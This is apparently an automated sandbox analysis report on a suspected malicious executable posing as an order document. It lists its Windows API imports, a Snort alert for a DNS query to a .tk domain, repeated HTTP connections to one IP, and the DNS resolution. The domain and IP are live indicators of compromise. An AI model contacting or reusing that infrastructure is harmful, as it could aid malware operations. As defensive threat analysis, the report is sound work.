KERNEL32.dll	SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetCurrentDirectoryA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.201.1.1.150882532012811 09/01/22-00:01:35.227375	UDP	2012811	ET DNS Query to a .tk domain - Likely Hostile	50882	53	192.168.11.20	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2022 00:01:35.308299065 CEST	49785	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:36.315388918 CEST	49785	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:38.330445051 CEST	49785	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:40.369848967 CEST	49786	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:41.376629114 CEST	49786	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:43.391850948 CEST	49786	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:45.408461094 CEST	49787	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:46.422430038 CEST	49787	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:48.437733889 CEST	49787	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:50.456871033 CEST	49788	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:51.468318939 CEST	49788	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:53.483436108 CEST	49788	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:55.499950886 CEST	49792	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:56.513902903 CEST	49792	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:01:58.529259920 CEST	49792	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:00.562407970 CEST	49793	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:01.575304985 CEST	49793	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:03.590568066 CEST	49793	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:05.609458923 CEST	49796	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:06.621233940 CEST	49796	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:08.636473894 CEST	49796	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:10.652667999 CEST	49797	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:11.666898012 CEST	49797	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:13.682023048 CEST	49797	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:15.698669910 CEST	49799	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:16.712882042 CEST	49799	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:18.727937937 CEST	49799	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:20.730597019 CEST	49800	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:21.742830992 CEST	49800	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:23.758183002 CEST	49800	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:25.764751911 CEST	49801	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:26.773145914 CEST	49801	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:28.788141966 CEST	49801	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:30.804523945 CEST	49802	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:31.818802118 CEST	49802	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:33.834007978 CEST	49802	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:35.852221966 CEST	49803	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:36.864648104 CEST	49803	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:38.879693031 CEST	49803	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:40.911767960 CEST	49805	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:41.925821066 CEST	49805	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:43.941128969 CEST	49805	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:45.957909107 CEST	49806	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:46.971666098 CEST	49806	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:48.986955881 CEST	49806	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:51.005455017 CEST	49807	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:52.017404079 CEST	49807	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:54.032732010 CEST	49807	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:56.049453020 CEST	49808	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:57.063225985 CEST	49808	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:02:59.078370094 CEST	49808	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:01.079262972 CEST	49810	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:02.093373060 CEST	49810	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:04.108613014 CEST	49810	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:06.111105919 CEST	49812	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:07.123639107 CEST	49812	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:09.138787985 CEST	49812	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:11.155225992 CEST	49813	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:12.169295073 CEST	49813	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:14.184425116 CEST	49813	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:16.201354027 CEST	49814	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:17.215018988 CEST	49814	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:19.230299950 CEST	49814	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:21.264312983 CEST	49815	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:22.276478052 CEST	49815	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:24.291551113 CEST	49815	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:26.307991982 CEST	49817	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:27.322268963 CEST	49817	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:29.321742058 CEST	49817	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:31.353950977 CEST	49818	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:32.367949963 CEST	49818	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:34.383192062 CEST	49818	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:36.400821924 CEST	49819	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:37.413822889 CEST	49819	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:39.428946972 CEST	49819	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:41.429650068 CEST	49820	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:42.443809986 CEST	49820	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:44.459158897 CEST	49820	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:46.459882021 CEST	49821	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:47.474100113 CEST	49821	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:49.489119053 CEST	49821	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:51.508166075 CEST	49822	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:52.519743919 CEST	49822	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:54.535005093 CEST	49822	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:56.552083969 CEST	49823	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:57.565715075 CEST	49823	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:03:59.580818892 CEST	49823	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:01.615175009 CEST	49825	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:02.626914978 CEST	49825	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:04.642173052 CEST	49825	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:06.660598993 CEST	49826	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:07.672652006 CEST	49826	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:09.688244104 CEST	49826	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:11.704653025 CEST	49827	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:12.718499899 CEST	49827	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:14.733779907 CEST	49827	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:16.750761986 CEST	49828	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:17.764363050 CEST	49828	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:19.779428959 CEST	49828	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:21.781795979 CEST	49829	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:22.794544935 CEST	49829	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:24.809544086 CEST	49829	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:26.810570955 CEST	49830	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:27.824507952 CEST	49830	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:29.839798927 CEST	49830	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:31.862165928 CEST	49831	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:32.870425940 CEST	49831	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:34.885493040 CEST	49831	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:36.903230906 CEST	49832	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:37.916188002 CEST	49832	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:39.915750980 CEST	49832	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:41.963422060 CEST	49833	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:42.977392912 CEST	49833	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:44.992593050 CEST	49833	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:47.009246111 CEST	49834	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:48.023334026 CEST	49834	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:50.022856951 CEST	49834	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:52.056209087 CEST	49835	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:53.068969965 CEST	49835	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:55.084228039 CEST	49835	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:57.100835085 CEST	49836	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:04:58.114957094 CEST	49836	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:00.130069971 CEST	49836	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:02.162220001 CEST	49838	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:03.176227093 CEST	49838	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:05.191390991 CEST	49838	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:07.209589005 CEST	49839	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:08.222074986 CEST	49839	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:10.237143040 CEST	49839	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:12.253990889 CEST	49840	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:13.267684937 CEST	49840	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:15.282912016 CEST	49840	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:17.314968109 CEST	49841	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:18.329225063 CEST	49841	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:20.344293118 CEST	49841	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:22.361998081 CEST	49842	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:23.374890089 CEST	49842	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:25.390021086 CEST	49842	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:27.407367945 CEST	49843	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:28.420733929 CEST	49843	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:30.436077118 CEST	49843	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:32.452739000 CEST	49844	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:33.466348886 CEST	49844	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:35.481728077 CEST	49844	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:37.468267918 CEST	49845	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:38.480988026 CEST	49845	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:40.496138096 CEST	49845	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:42.512795925 CEST	49846	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:43.526681900 CEST	49846	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:45.541877031 CEST	49846	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:47.558619022 CEST	49847	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:48.572536945 CEST	49847	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:50.587666988 CEST	49847	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:52.605308056 CEST	49848	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:53.618202925 CEST	49848	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:55.633481979 CEST	49848	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:57.665754080 CEST	49850	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:05:58.679605007 CEST	49850	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:00.694912910 CEST	49850	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:02.711654902 CEST	49851	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:03.725409031 CEST	49851	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:05.740746021 CEST	49851	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:07.758641958 CEST	49852	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:08.771286964 CEST	49852	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:10.786423922 CEST	49852	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:12.803191900 CEST	49853	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:13.816901922 CEST	49853	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:15.832231045 CEST	49853	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:17.832936049 CEST	49854	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:18.847167969 CEST	49854	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:20.862377882 CEST	49854	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:22.865425110 CEST	49856	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:23.877306938 CEST	49856	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:25.892396927 CEST	49856	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:27.909769058 CEST	49857	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:28.922985077 CEST	49857	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:30.938308954 CEST	49857	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:32.954675913 CEST	49858	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:33.968787909 CEST	49858	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:35.984196901 CEST	49858	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:38.025070906 CEST	49859	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:39.030184031 CEST	49859	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:41.045337915 CEST	49859	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:43.062282085 CEST	49860	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:44.075977087 CEST	49860	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:46.091120005 CEST	49860	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:48.107980967 CEST	49861	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:49.121711016 CEST	49861	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:51.136956930 CEST	49861	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:53.156383991 CEST	49862	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:54.167506933 CEST	49862	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:56.182868004 CEST	49862	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:58.183674097 CEST	49863	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:06:59.197798967 CEST	49863	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:01.212804079 CEST	49863	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:03.213906050 CEST	49864	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:04.227773905 CEST	49864	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:06.243077040 CEST	49864	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:08.262156010 CEST	49865	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:09.273644924 CEST	49865	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:11.288814068 CEST	49865	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:13.305212021 CEST	49866	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:14.319245100 CEST	49866	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:16.334534883 CEST	49866	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:18.366764069 CEST	49867	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:19.380742073 CEST	49867	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:21.396032095 CEST	49867	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:23.414257050 CEST	49868	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:24.426461935 CEST	49868	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:26.441658974 CEST	49868	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:28.458142042 CEST	49870	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:29.472472906 CEST	49870	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:31.472223043 CEST	49870	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:33.510184050 CEST	49871	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:34.517997980 CEST	49871	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:36.533216953 CEST	49871	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:38.519942999 CEST	49872	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:39.532572985 CEST	49872	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:41.547805071 CEST	49872	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:43.565249920 CEST	49873	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:44.578368902 CEST	49873	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:46.593512058 CEST	49873	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:48.609992981 CEST	49874	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:49.624171972 CEST	49874	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:51.639264107 CEST	49874	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:53.656806946 CEST	49875	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:54.669848919 CEST	49875	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:56.685096025 CEST	49875	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:58.717271090 CEST	49876	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:07:59.731298923 CEST	49876	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:01.746675014 CEST	49876	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:03.762830973 CEST	49877	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:04.777025938 CEST	49877	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:06.792222023 CEST	49877	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:08.809931040 CEST	49880	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:09.822875023 CEST	49880	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:11.838067055 CEST	49880	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:13.854523897 CEST	49881	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:14.868701935 CEST	49881	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:16.883871078 CEST	49881	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:18.885066986 CEST	49882	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:19.898660898 CEST	49882	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:21.913969994 CEST	49882	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:23.916958094 CEST	49883	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:24.928888083 CEST	49883	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:26.943963051 CEST	49883	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:28.961189985 CEST	49884	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:29.974617958 CEST	49884	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:31.989808083 CEST	49884	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:34.007514954 CEST	49886	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:35.020467043 CEST	49886	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:37.020049095 CEST	49886	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:39.068603039 CEST	49887	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:40.081866980 CEST	49887	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:42.096992970 CEST	49887	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:44.113864899 CEST	49888	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:45.127551079 CEST	49888	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:47.142791986 CEST	49888	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:49.159198046 CEST	49889	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:50.173455954 CEST	49889	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:52.188612938 CEST	49889	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:54.212279081 CEST	49890	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:55.219248056 CEST	49890	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:57.234247923 CEST	49890	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:08:59.220036030 CEST	49891	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:00.233684063 CEST	49891	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:02.248836040 CEST	49891	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:04.266002893 CEST	49892	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:05.279441118 CEST	49892	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:07.294612885 CEST	49892	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:09.312048912 CEST	49893	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:10.325592995 CEST	49893	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:12.340536118 CEST	49893	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:14.357569933 CEST	49894	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:15.371059895 CEST	49894	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:17.386091948 CEST	49894	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:19.418311119 CEST	49895	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:20.432310104 CEST	49895	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:22.447699070 CEST	49895	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:24.465517998 CEST	49896	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:25.478198051 CEST	49896	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:27.493506908 CEST	49896	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:29.509596109 CEST	49897	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:30.524054050 CEST	49897	80	192.168.11.20	45.8.132.92
Sep 1, 2022 00:09:32.542169094 CEST	49897	80	192.168.11.20	45.8.132.92

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2022 00:01:35.227375031 CEST	50882	53	192.168.11.20	1.1.1.1
Sep 1, 2022 00:01:35.296704054 CEST	53	50882	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 1, 2022 00:01:35.227375031 CEST	192.168.11.20	1.1.1.1	0x8709	Standard query (0)	mnhckm.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 1, 2022 00:01:35.296704054 CEST	1.1.1.1	192.168.11.20	0x8709	No error (0)	mnhckm.tk		45.8.132.92	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: Order_002376662-579588_Date 24082022.exePID: 2812, Parent PID: 5772

General

Target ID:	2
Start time:	00:01:06
